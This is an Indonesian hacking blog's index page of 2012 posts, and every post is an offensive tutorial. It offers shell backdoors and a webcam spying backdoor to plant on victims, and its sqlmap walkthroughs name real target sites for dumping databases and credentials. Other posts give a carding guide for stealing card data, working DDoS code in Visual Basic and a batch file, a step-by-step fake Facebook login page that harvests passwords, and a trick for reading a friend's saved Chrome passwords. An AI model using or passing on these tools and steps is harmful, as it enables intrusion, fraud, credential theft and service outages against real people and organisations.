Artikel Terkini

Friday, December 21, 2012

Script LFI/RFI/SQL Scanner + Step by Step Mini Instalasi (backstrack)

0 comments

LFI

Suatu hari si Angga aka Bambang nge share blognya di facebook :) , lalu ane tertarik dengan salah satu artikelnya yang berjudul script LFI  dan repost aja disini
— Instalasi melalui shell deface.
LFI1

— mau coba? silahkan langsung dicomot.
script : http://paste.hacker-community.org/136
demo : http://koalakids.ie/wp-content/upload/lfi.php
— done

create by Lindo.
author script by Angga
Baca Selengkapnya →

shell backdoor

0 comments
Buat agan yg suka meretas website or defacer(widih sereeeeemm :D ) silahkan sedot nih backdoor siapa tau berguna, btw shell backdoor ini aman dari keyloger kok, sedot dimari shell
Yang suka jumping server ini shell nya jumping
And yg suka Crack cpanel sedot aja ini shellnya Cpanel
Ini yg terbaru gan Shell Symlink Versi_03 sedot dimari gan symlink

ns : http://devinclous.wordpress.com
Baca Selengkapnya →

webcam backdoor

0 comments
Tool ini adalah backdoor Webcam untuk memperlihatkan tampilan yang dilakukan oleh webcam di komputer target yang menggunakan sistem operasi Windows.
Setelah anda mendownload Webcam Backdoor yang terkompres lalu melakukan extract maka akan muncul 2 buah files, yaitu :
Server.exe : Untuk di jalankan dikomputer korban
client.exe : Untuk di jalankan di komputer penyerang
webcam backdoor 1
file Server.exe digunakan untuk di jalankan di komputer korban, lalu yang file client.exe dijalankan di komputer penyerang
webcam backdoor 2
*Program ini terdeteksi sebagai malware oleh AV
Download disini

Cara menjalankannya :
Pemakaiannya, jalankan program Server.exe ke komputer target, setelah di jalankan maka jalankan program client.exe di komputer anda, masukkan saja IP komputer client pada input dari program client, penyerang dapat melihat tampilan yang dilakukan oleh webcam di komputer target melalui program client.exe
Untuk mengetahui IP komputer korban, di dalam komputer korban, anda masuk saja di command prompt di komputer tersebut lalu masukkan perintah ipconfig lalu enter.
 ns :  http://devinclous.wordpress.com
Baca Selengkapnya →

SQL MAP in windows

0 comments
kali ni ane share tutorial teknik deface via sqlmap... :)
Ok langsung saja Download dahulu alat perangnya hahah kek apa aja
SQL Map 0.0.9
-Pyhton 2.7
Install pythonnya
extract SQLmapnya(misalkan saya extrack di C:\sqlmap )
Pertama Siapkan website yang vuln
sekarang kita buka cmd (command and prompt)
Klik Start ->All Programs -> Accessories-> Command and prompt
atau WIN-Key + R ketik cmd (Start -> Run ->ketik CMD enter)
sekarang kita menuju direktory dimana tempat folder sqlmap berada
pertama kita ketik perintah cd\ [enter]
maka kita akan drive C
lalu menuju folder sqlmap dengan cara ketik
cd sqlmap [enter]
maka akan ke C:\sqlmap>
Ok kita mulai
ketik perintah yang berwarna merah setelah menuju folder sqlmap berada folder sqlmap saya di drive C:\sqlmap
sqlmap.py -u http://www.targetnmu.co.id/product.php?kat1=3 –dbs
yang berwarna biru diganti web vuln kamu
lihat gambar ini:
sql1
setelah di enter maka script sqlmap akan bekerja untuk mencari nama databasenya
Lalu kita lihat isi tablenya dengan mengetik
sqlmap.py -u http://www.targetkamu.co.id/product.php?kat1=3 -D green_datadedaunan –tables [enter]
-D = database
–tables=untuk mendapat tables dari db
kkkk
sql3
eh muncul juga table dalam databasenya
+————–+
| green_kat1 |
| green_kat2 |
| green_news |
| green_page |
| green_produk |
| green_user |
+————–+
kita lihat dari table tersebut kira2 user dimana? mungkin di green_user :)
ayo kita check dengan perintah ini
sqlmap.py -u http://www.targetkamu.co.id/product.php?kat1=3 -D green_datadedaunan -T green_users –columns [ENter]
-T = nama table
–columns=melihat columns di table
sql4
Lihat itu username dan passwordnya ^ atau yg gambar ini


sql5   

ns : http://devinclous.wordpress.com
Baca Selengkapnya →
Friday, December 14, 2012

tutorial carding vioa google extractor n' sql exploiter (maling data)

0 comments
ok agan" yg ganteng and adik", kakak", tante" , om" , nenek" , kakek" , yang ga kalah gaul n' tetep axis... :D
langsung aje ane cuap" dmari... hehehehe.... :)

Hmmmm, kali ini ane bagi postingan mengenai Tutorial Carding, cikikikik…
Banyangkan seorang Carder bisa memperoleh banyak uang yang mereka curi dari Situs target, maupun suatu data penting yang dicuri dan akan dimintai bayaran atau tebusan.
Ckckck… *yaaa itu buat yang sudah Dewa dan VIP
Untuk yang masih pemula, yaa mari kita pelajari dulu tahapan-tahapannya.

Kali ini kita akan belajar tentang Carding : yaitu mencuri data penting dari suatu situs.
Mungkin tutorial ini sudah banyak, yaa tak apa yang penting asoy dh... :D agkgkgkgkk
and ga kalah  penting kita mendapat ilmu dan wawasan baru.

Oke ikuti petunjuknya dibawah ini :

Sebelumnya anda harus menyiapkan Toolsnya dulu, nih disedot ajah :
=> Google Url Extractor
=> SQL Exploiter

Lalu ikuti tahap-tahap dibawah :
1. Buka Google Extractor, lalu masukan dork “product.asp?id=site:il” tanpa tanda petik.
2. Kemudian Scan,jika sudah muncul link-link silahkan klik kanan pada link tersebut lalu Remove Duplicate, biar ngga bingung coyy.. :D
3. Kemudian pindah ke tab Sql Injector Query Builder
4. masukan argumen tanda tanya (?) di Insert arguments here
5. kalo sudah klik Build dan Scan
6. trus ke tab berikutnya yaitu tab Attack Victim
7. cari yg error result nya : unclosed quotation mark before the character ….. gk tau knp pokok nya ikutin aja jgn banyak tanya :p
8. klik kanan copy url yg victim tahap pemakaian sql exploiter
9. buka sql exploiter trus ke tab Attacker for the Hackable Site !!
10. klik Add Manualy , masukan url victim yg tadi, trus paste (kadang tanda harus di hilangkan)
11. kalo udah klik Site Info sampai infonya keluar
12. kalo udah keluar maka tinggal Get Tables, maka akan muncul table” web tersebut, yg ku tandai warna biru
13. pilih salah 1 yg ada di table tsbt, yg kira” dimana letak CC nya, trus Get Columns buat mengetahui columns apa aja di table tsb, tapi kali ini aku gk ke table order
14. kalo udah muncul semua columns , drag semua colomns terus Amibil deh datanya
6
Waawww… bagaimana-?
Seru, kan-? Bayangkan yang kita dapatkan data-data penting dan yang punya data itu Orang Kaya :D
hahaha.. :D
Habiskan deh..

Tapi inget klo kenapa-kenapa gue ngga tanggung jawab, wleee.. :p
Jangan lupa komentarnya yooh :)
hehehe.. :D

Sumber : Cyber4rt

Baca Selengkapnya →

script app Ddos dgn VB

0 comments
1. Buka Visual Basic 6 sobat.
2. Buat project baru,
3. Masukkan componen Microsoft Winsock Control
4. Masukkan coding berikut

Dim FILENAME As String, listItem As String

Private TransferRate As Single
Private TransferRate2 As Single
Private Xstart As Long
Private Ystart As Long
Private m_objIpHelper As CIpHelper

'Deklarasikan fungsi API untuk mengeksekusi suatu 'Hyperlink
Private Declare Function ShellExecute _
Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hWnd _
As Long, ByVal lpOperation As String, ByVal lpFile _
As String, ByVal lpParameters As String, ByVal _
lpDirectory As String, ByVal nShowCmd As Long) As Long

Const SW_SHOWNORMAL = 1  'Konstanta untuk menampilkan 'jendela normal

Private Sub CMDMULAI_Click()
TXTURL.Text = Replace(TXTURL.Text, "http://", "")
Sock.Close
Sock.Connect TXTURL, TXTPORT
Timer1.Enabled = True
SIMPAN_PESAN
On Error Resume Next
Timer1.Interval = TXTWAKTU.Text
End Sub

Private Sub CMDSTOP_Click()
Sock.Close
Timer1.Enabled = False
lblStatus.Caption = "Putus"
lblStatus.ForeColor = &HFFFFFF
LBLWARN.Caption = "Menunggu perintah"
Timer2.Enabled = False
End Sub

Private Sub Form_Load()
Timer1.Interval = TXTWAKTU.Text
LOAD_PESAN
'Fungsi penggunaan badwith internet
Set m_objIpHelper = New CIpHelper
End Sub

Private Sub Form_MouseMove(Button As Integer, Shift As Integer, X As Single, Y As Single)
LBLSITUS.ForeColor = &HFFFF&
End Sub

Private Sub Form_Unload(Cancel As Integer)
Sock.Close
End
End Sub

Private Sub LBLSITUS_Click()
Dim situs As Long
  'Tampilkan program default untuk membuka situs ke
  'alamat lblSitus
  situs = ShellExecute(0, vbNullString, _
          LBLSITUS, "", "", vbNormalFocus)
  LBLSITUS.ForeColor = &H8000& 'Setelah diklik, berubah
                               'warna
End Sub

Private Sub LBLSITUS_MouseMove(Button As Integer, Shift As Integer, X As Single, Y As Single)
LBLSITUS.ForeColor = &HFF&
LBLSITUS.MousePointer = 2
End Sub

Private Sub MNUUP_Click()
FRMUP.Show
End Sub

Private Sub SocK_Close()
 lblStatus.Caption = "Putus"
End Sub

Private Sub SocK_Connect()
lblStatus.Caption = "Tersambung"
End Sub

Private Sub SocK_Error(ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean)
Sock.Close
lblStatus.Caption = "Soket error"
End Sub

Private Sub Timer1_Timer()
Dim DATA As String
DATA = TXTDATA.Text
If Sock.State = sckConnected Then
        Do
        On Error GoTo REMUK
        Sock.SendData DATA
     
        lblStatus = "Menyerang"
        lblStatus.ForeColor = &HFF00&
        LBLDATA.Caption = Sock.SocketHandle
        DoEvents
        lblSent.Caption = lblSent.Caption + 1
        Loop
REMUK:
        LBLWARN.Caption = "Koneksi putus. Mencoba koneksi kembali ..."
        Timer2.Enabled = True

Else
      
        CMDSTOP_Click
        Timer2.Enabled = True
        LBLWARN.Caption = "Koneksi putus. Mencoba koneksi kembali ..."
End If
End Sub

Private Sub Timer2_Timer()
LBLWARN.Caption = "Koneksi putus. Mencoba koneksi kembali ..."
If Timer2.Interval = 2000 Then
CMDMULAI_Click
Timer2.Enabled = False
LBLWARN.Caption = "Asyik ... terkoneksi lagi ... dech!!"
End If
End Sub

Private Sub tmrPoll_Timer()
tmrPoll.Enabled = False
  On Error GoTo ErrH
  Dim objInterface        As CInterface
  Static lngBytesRecv     As Long
  Static lngBytesSent     As Long
  Dim lIn As Long, lOut As Long

  Set objInterface = m_objIpHelper.Interfaces(1)
  lIn = m_objIpHelper.BytesReceived - lngBytesRecv - 3296
  lOut = m_objIpHelper.BytesSent - lngBytesSent - 3296
  If lIn < 0 Then lIn = 0
  If lOut < 0 Then lOut = 0

  LBLDOWNLOAD.Caption = "DL: " & GetTransferRate(lIn) & "/sec"
  LBLUPLOAD.Caption = "UL: " & GetTransferRate(lOut) & "/sec"
  picGraph.ScaleMode = 3
  DrawUsage picGraph, lIn, lOut
  lngBytesRecv = m_objIpHelper.BytesReceived
  lngBytesSent = m_objIpHelper.BytesSent
  DoEvents
  tmrPoll.Enabled = True
Exit Sub
ErrH:
  tmrPoll.Enabled = True
  Debug.Print Err.Description
End Sub

Function GetTransferRate(pDiff As Long) As String
  Dim d As Double

   d = pDiff / 1024
  If d < 1024 Then
    GetTransferRate = Trim(Format(d, "#,##0.00")) & " Kb"
    Exit Function
  End If

  ' Mbytes
  d = pDiff / 1024
  GetTransferRate = Trim(Format(d, "#,##0.00")) & " Mb"
End Function

Private Sub TXTPORT_KeyPress(KeyAscii As Integer)
If Not (KeyAscii >= Asc("0") & Chr(13) _
     And KeyAscii <= Asc("9") & Chr(13) _
     Or KeyAscii = vbKeyBack _
     Or KeyAscii = vbKeyDelete _
     Or KeyAscii = vbKeySpace) Then
        Beep
        KeyAscii = 0
   End If
End Sub

Private Sub TXTWAKTU_KeyPress(KeyAscii As Integer)
If Not (KeyAscii >= Asc("0") & Chr(13) _
     And KeyAscii <= Asc("9") & Chr(13) _
     Or KeyAscii = vbKeyBack _
     Or KeyAscii = vbKeyDelete _
     Or KeyAscii = vbKeySpace) Then
        Beep
        KeyAscii = 0
   End If
End Sub

Sub LOAD_PESAN()
FILENAME = App.Path & "/PESAN.txt"
TXTDATA.Text = ""

On Error Resume Next
Open FILENAME For Input As #1
    Do While Not EOF(1)
        Input #1 & vbNewLine, listItem
        'If Not (listItem = "") Then
            TXTDATA.Text = listItem
        'End If
    Loop
 
Close #1

End Sub

Sub SIMPAN_PESAN()
Open App.Path & "/PESAN.txt" For Output As #1
Print #1, TXTDATA.Text
Close
End Sub

3. Simpan dan jalankan project sobat.




Warning: Hati - hati dalam menggunakan tool ini. Gunakan secara bijak


Baca Selengkapnya →

cara membuat Ddos attack

0 comments
Assalamualaikum,, kali ini ane akan share mengenai bagaimana membuat ddos :

Peralatan menggunakan :
OS : ubuntu
prog : PYlorys

cukup menggunakan PYlorys website udah down server..

cara menggunakan pyloris yaitu..
cekidot....

pertama adalah..
anda halus memiliki paket-paket yg di jadikan setup.py.
seperti :
# PYTHON
# ..00PYLORIS00..
# NMAP

jika anda belum memiliki paket-paket tersebut , ane jelasin cara mengambil paket tersebut..

#sudo apt-get update

setelah itu ,

#sudo apt-get install Python

setelah itu, /etc/Python 3.0/pyloris.py

#sudo ./etc/Python 3.0/pyloris.py

jika sudah paket Python sudah terinstall , setelah itu paket ...00Pyloris00... yg kita install..

# apt-get update

setalah itu,

# sudo webget Pyloris 3.2.deb &quot;http://kambing.ui.ac.id&quot;

setalah itu mari kita instal pyloris

#sudo apt-get install pyloris

setelah itu ,

# sudo apt-get update

setelah itu,masuk kedirectory pyloris 3.0

# sudo ./etc/pyloris 3.2/pylory.py

screeanshot pylorys 3.2

Salam Lombok Cyber Dark | Indonesia Fighter Cyber
Baca Selengkapnya →

Hacking Website Dengan SQLmap

0 comments
Maaf terlalu singkat....!!!
Mencari database :

>sqlmap.py -u www.nass.gov.ng/mnass/about.php?id=13 --dbs


Menampilkan isi tabel

>sqlmap.py -u www.nass.gov.ng/mnass/about.php?id=13 -D nass_nassdb --tables

[28 tables]
 
Menambilkan isi tabel

>sqlmap.py -u www.nass.gov.ng/mnass/about.php?id=13 -D nass_nassdb --tables

 
untuk mencari columns gunakan cara

>sqlmap.py -u www.nass.gov.ng/mnass/about.php?id=13 -D nama_databenya -T nama_tabelnya --columns


Untuk Mencari user dan paswwordnya

>sqlmap.py -u www.nass.gov.ng/mnass/about.php?id=13 -D nama_databenya -T nama_tabelnya --dump

 
Salam Indonesia Fighter Cyber | Lombok Cyber Dark
Baca Selengkapnya →

phissing for all

0 comments
assalamualaikum

sesuai judul, kita akan coba membuat phissing m.facebook.com

nah pertama kita buka situs nya dulu : http://m.facebook.com

dan sekarang kita CTRL+ U dan tekan CTRL + F sekarang cari ini "action=" tanpa tanda petik ya

dan nanti ketemu pada bagian ini

<form method="post" id="login_form" action="https://m.facebook.com/login.php?m=m&amp;refsrc=http%3A%2F%2Fm.facebook.com%2F&amp;refid=8">

nah pada yang bercetak tebal di atas itu kita ganti aja

method="post" menjadi method="get"

action="https://m.facebook.com/login.php?m=m&amp;refsrc=http%3A%2F%2Fm.facebook.com%2F&amp;refid=8"

menjadi

action="data.php"

kalau sudah save menjadi index.php

sekarang kita buat 1 file lagi :D

file data.php nya :D :))

ambil di sini script php nya

http://pastebin.com/ZnVfG4zF

pada bagian ini

header("Location: http://situs-targetnya.com");

lihat pada link ini : http://situs-targetnya.com

di ganti aja http://m.facebook.com

contoh nya sperti ini : header("Location: http://m.facebook.com");

oke sekarang save dengan nama data.php

bila sudah upload di hostingan kalian :D lihat hasil nya =)) di bagian passwords.txt

totur ini bisa kita kembangkan sendiri kamu bisa membuat all site / fake log in semua site :D

yang kamu mau =)) contoh nya : http://twitter.com/ , http://Gemscool.com/

#nb kalau mau lebih mantap buat domain aja :)) yang menyerupai site tersebut :)) =))


Salam Lombok Cyber Dark | Indonesia Fighter Cyber

Baca Selengkapnya →
Monday, December 3, 2012

trik mengetahui password facebook dengan google chrome

0 comments
 langsung aje yee abang" and empo" yg semok... :D
ane share trik mengetahui password facebook dengan google chrome...

1. Anjurkan teman Anda untuk Login/masuk ke Facebooknya dengan menggunakan browser Google Chrome.
2.Ketika teman Anda sudah akan selesai mengetikan username dan password,JANGAN LUPA CENTANG ”BIARKAN SAYA TETAP MASUK” sebelum dia Login.
3. Lalu biarkanlah teman Anda berfacebookan ria.
Naah inilah triknya jika ingin mengetahui passwordnya
cara-nya adalah:
1. Masuk Google Chrome lalu klik tombol/icon Obeng ( terletak pada Pojok kanan Atas) 
2. Lalu klik “PILIHAN”
3. Lalu klik “Tampilakan Sandi yang di simpan” seperti gambar di bawah

  4. Di situlah kita dapat melihat semua password dan dari situs mana saja kita login. Termasuk teman Anda 

5. Pergunakanlah trik cara mengetahui password facebook.com Dengan Google Chrome dengan bijak dan mohon trik tersebut tidak disalah gunakan.... :)
 
met happy fun....




                                                                                                                                                                                                                                                                    





Baca Selengkapnya →
Sunday, December 2, 2012

cara membuat script ddos attack via notpad

0 comments
langsung aje ane share script na buat abang" yg cantik n' empo" yg ganteng.. :D cikikikikik

@echo off
mode 67,16
title GBOYS_FLUSH ATTACK
color 0a
cls
echo.
echo DDOS With Batchfile
echo.
set /p x=Server-Target:
echo.
ping %x%
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo.
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0c
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS

cara na :
- buka notpad
- copy paste script na yg diatas
- lalu save as
- file name : gboys_flush Ddos.bat
- save as type : all files

moga bermanfaat n' jgn disalah gunakan ya... :) pi klo ngerusak ga papa... :D cikikikikik...(just kidding)
Baca Selengkapnya →